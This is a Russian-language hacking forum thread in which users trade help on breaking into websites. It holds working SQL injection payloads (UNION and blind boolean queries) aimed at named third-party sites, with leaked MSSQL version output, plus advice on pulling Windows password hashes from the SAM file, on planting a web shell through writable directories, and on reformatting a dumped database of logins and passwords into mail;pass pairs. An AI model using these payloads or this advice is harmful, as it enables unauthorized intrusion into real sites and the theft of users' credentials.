Обычное внедрение SQL-кода в запрос: Code: SELECT * FROM products WHERE category_id in (SQL) and hidden=0 ... Можно просто сделать так: Code: 1) and 1=2 UNION SELECT ...# Советую обратиться к документации MySQL.
Что-то не получается вывести так версию БД Покажи запрос полностью. http://aqua-st.ru/catalog/102%20order%20by%201#
http://*******.ru/catalog/102)and(0)=(1)union(select(1),2,3)# Если твой браузер не отправляет в запросах символ '#', используй сниферы с возможностью изменения запросов на лету (в Charles - Ctrl+Shift+W, Rules, Type=Path, Match=^(.*)$, Replace=$1#) Число столбцов подбирать придется вручную. Возможно, я ошибаюсь, но их не менее 999 upd: Все-таки ошибся. При правильном количестве столбцов ошибки в запросе больше нет. Но она есть во втором запросе Как видно из второго запроса, он вызовет ту же ошибку, поэтому софт пропустил правильное количество при прямом переборе. Использовать union не получится. Только как слепую крутить. Столбцов, как оказалось, 27. 102)and(1)=if(((select(count(*))from(information_schema.columns)where(table_name=0x70726F6475637473)and(table_schema=database()))>26),1,0)# true 102)and(1)=if(((select(count(*))from(information_schema.columns)where(table_name=0x70726F6475637473)and(table_schema=database()))>27),1,0)# false
Пароли от учетных записей в нынешних операционных системах не хранятся. Найти можно только hash пароля. Если тебе нужен hash пароля учетной записи то он в windows хранится в SAM файле. Тебе в system32.
искал, гуглил, но не нашел мануала как рутать винду оО. Консолька в всо не канает. Мб кто подкинет мануальчик?
Не рутать, а получить права админа. Для этого есть эксплоиты, для начала посмотри это видео: https://forum.antichat.net/showpost.php?p=2770920&postcount=1
Народ) собсно такой вопрос... Вообщем есть скуль с правами Y, но нет папки на запись... инклуда тоже нет = \ Вообщем то нарыл доступ по ssh к этому серверу..... но права у юзера уг у моего юзера например директория /home/myuser а сайт лежит в дириктории /home/siteuser/ Можно ли как то залить шелл в корень сайта?) Порутать сервак не получится = \ т.к. Linux 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux Есть какие нибудь варианты как залить шелл ?))
Почему обязательно в корень сайта? Можно залить и скажем в images и другие подобные директории открытые на запись.. А потом, если необходимо, переместить шелл в корень... Через SSH просмотри в /home/siteuser/ любую открытую на запись директорию, и лей, лей..
здравствуйте, нашел интересную иньекцию, судя по всему mssql.Если в данной форме ввести кавычку, вылетает ошибка.Как такое можно раскрутить?
POST http://www.socketmobile.com/support/wifi/pw.asp POSTDATA(вариант 1): Email=1')+UNION+SELECT+1,2,@@version,4--+&submit=Send+Registration+Key POSTDATA(вариант 2): Email=asd')+OR+1=@@version--+&submit=Send+Registration+Key Result: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
значит все пытаюсь раскрутить эту скулю.Наблюдается интересное явление:при запросе мы видим что существует колонка code в таблице View_DRM_Keys.Но когда делаем выборку: видим следующее:Invalid column name 'code'.Почему так? Потом поэксперементировав я обнаружил, что вытаскивая колонки из разных таблиц, вытакскиваются колонки с одними и теме же именами, хотя в данных таблицах они могут и не существовать.Что можно предпринять?
мб пишу не в правильную тему, но возникла такая проблема. Сдампил бд mssql, там вот такой вид: Code: INSERT INTO tbl_xxx(id,password,accounttype,birthdate,BCodeTU,Email) VALUES ('login ','password ','0','Jan 01 1900 12:00AM','0','email'); как привести такие строчки к виду Code: mail;pass ???
